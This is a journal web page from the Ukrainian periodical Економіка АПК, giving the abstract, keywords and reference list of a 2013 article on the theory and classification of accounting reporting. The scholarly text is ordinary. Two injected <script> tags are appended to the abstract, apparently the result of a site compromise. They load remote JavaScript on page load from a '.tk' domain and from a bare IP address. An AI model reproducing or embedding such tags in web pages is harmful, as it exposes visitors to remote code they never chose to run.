ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 657.37
Сторінка молодого науковця

Теоретичні засади бухгалтерської звітності / Чухно І. С. // Економіка АПК. - 2013. - № 5 - С. 124

Бухгалтерська звітність є джерелом, що надає єдину й об’єктивну інформацію про фінансово-господарську діяльність суб’єктів господарювання та є системою підтримки прийняття управлінських рішень. У статті окреслено теоретичні аспекти формування бухгалтерської звітності, розкрито сутність її поняття як обліково-економічної категорії, обґрунтовано основні концепції її визначення. Розглянуто основоположні наукові підходи щодо визначення суті категорії “звітність”. Запропоновано уточнення понять “звітність” та “бухгалтерська звітність” із метою однозначного їх трактування в майбутніх економічних дослідженнях. Вказано переваги запропонованої характеристики досліджуваних понять. Розглянуто сучасні підходи до класифікації видів звітності й обґрунтування класифікаційних ознак. Надано пропозиції щодо удосконалення систематизації видів звітності. Внесення запропонованих доповнень дасть поштовх до подальших розробок у теорії бухгалтерської звітності. Бібліогр.: 25.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: обліково-економічна категорія, звіт, звітність, бухгалтерська звітність, система даних, сукупність показників, класифікація звітності

Список використаних джерел

 1. Балицька П.С. Бухгалтерський облік / П.С. Балицька, М.І. Карбовник, І.Д. Козак. – К.: Вища шк., 1972. – 348 с.
 2. Белоусов М.С. Бухгалтерский учет и калькуляция в промышленности продовольственных товаров / М.С. Белоусов, Б.А. Титов. – М.: Пищепромиздат, 1957. – 326 с.
 3. Бутинець Ф.Ф. Звітність підприємства: [навч. посіб.; за ред. проф. Ф.Ф. Бутинця та Н.А. Остап’юк] / Ф.Ф. Бутинець, Н.А. Остап’юк. – Житомир: ЖДТУ, 2005. – 428 с.
 4. Васюта-Беркут О.І. Теорія бухгалтерського обліку: [навч. посіб., за заг. ред. В.Б. Захожая] / О. І. Васюта-Беркут, Г. Ф. Шепітко, Н. О. Ромашевська. – 2-ге вид., стереотип. – К.: МАУП, 2003. — 176 с.
 5. Давидов Г.М. Звітність підприємств : [навч. посіб.] / Г. М. Давидов, Н. С. Шалімова. – К.: Знання, 2010. – 624 с.
 6. Джинджиристий Т.М. Бухгалтерський облік у сільському господарстві: [підруч.] / Т.М. Джинджиристий, Я.М. Баренгольц. – К.: Вища шк.,1995. –224 с.
 7. Кірейцев Г.Г. Фінансовий менеджмент / Г. Г. Кірейцев. – Житомир: ЖІТІ, 2001. – 440 с.
 8. Кожарский В.В. Бухгалтерский учет в торговле: [учеб. пособие; под общ. ред. В. В. Кожарского, Л. И. Кравченко] / В. В. Кожарский, З. В. Кудрявец, З. М. Пименова, С. И. Филипенко. – Мн.: Выш. шк., 1996. – 408 с.
 9. Кузнецова С.А. Бухгалтерський облік в системі формування управлінської інформації: методологія та практика: моногр. / С.А. Кузнецова. – Мелітополь: ТДАУ, 2007. – 298 с.
 10. Кучеренко Т.Є. Фінансова звітність як складова економічних наук / Т. Є. Кучеренко // Бухгалтерський облік і аудит. – 2008. – №9. – С. 21-29.
 11. Малышев И.В. Теория бухгалтерского учета: [учеб. пособие для с.-х. вузов] / И. В. Малышев. – М.: Финансы и статистика, 1981. – 264 с.
 12. О бухгалтерском учете и отчетности: Закон Республики Беларусь от 18.10.1994 [Электронный ресурс]. – Режим доступа: http://profbuh.by/buxgalteru/statja-zakon/2/.
 13. О бухгалтерском учете: Федеральный закон Российской Федерации от 21.11.1996 № 129-ФЗ [Электронный ресурс]. – Режим доступа: http://www.consultant.ru/popular/.
 14. Пантелеєв В.Г. Фінансова звітність / В. Г. Пантелеєв. – К., 2004. – 228 с.
 15. Податковий кодекс України (із змінами, внесеними згідно із законом № 5043-17 від 15.08.2012) / [Електронний ресурс]. – Режим доступу: http://zakon2.rada.gov.ua/laws/show/2755-17.
 16. Поклад И.И. Курс бухгалтерского учета : [второе, перераб. и доп. изд.] / И. И. Поклад. – М.: Госфиниздат, 1963. – 488 с.
 17. Положення (стандарт) бухгалтерського обліку 1 “Загальні вимоги до фінансової звітності”: затверджене наказом Міністерства фінансів України від 31.03.99 р. №87 [Електронний ресурс]. – Режим доступу: http://zakon3.rada.gov.ua/laws/show?nreg=z0391-99&page=1#o17.
 18. Richards Belinda and Wood David. The Value of Social Reporting [Електронний ресурс]. – Режим доступу: http://hausercenter.org/iri/wp-content/uploads/2010/05/Value-of-Social-Reporting.pdf.
 19. Свідерський Є.І. Податковий облік як підсистема бухгалтерського обліку / Є. І. Свідерський, Д. Є. Свідерський // Фінанси, облік і аудит : зб. наук. праць / М-во освіти і науки, молоді та спорту України, ДВНЗ “Київський нац. екон. ун-т ім. В. Гетьмана”. – К.: КНЕУ, 2011. – Вип. 17. – С. 334–341.
 20. Соколов Я.В. Бухгалтерский учет: история и современность. Принципы и концепции бухгалтерского учета / Я. В. Соколов. – Т.1.– Уфа: ИЦ “БТИПБ”, 2000. – 214 с.
 21. Сопко В.В. Бухгалтерський облік в управлінні підприємством: [навч. посіб.] / В. В. Сопко. – К.: КНЕУ, 2006. – 526 с.
 22. Сторожук Т.М. Звітність підприємств : [навч. посіб.] / Т. М. Сторожук. – Ірпінь : НАДПС України, 2005. – 412 с.
 23. Хомин П.Я. Формування звітності в підсистемах фінансового, управлінського й податкового обліку: моногр. / П.Я. Хомин. – Тернопіль: Економічна думка, 2004. – 288 с.
 24. Швець В.Г. Теорія бухгалтерського обліку: [підруч.] / В.Г. Швець. – К.: Знання, 2004. — 448 с.
 25. Щерба С.П. Філософія : [навч. посіб.; за заг. ред. С. П. Щерби] / С. П. Щерба, В. К. Щедрін, О. А. Заглада.— К. : МАУП, 2004. — 216 с.
Читати статтю: 13_05_20.pdf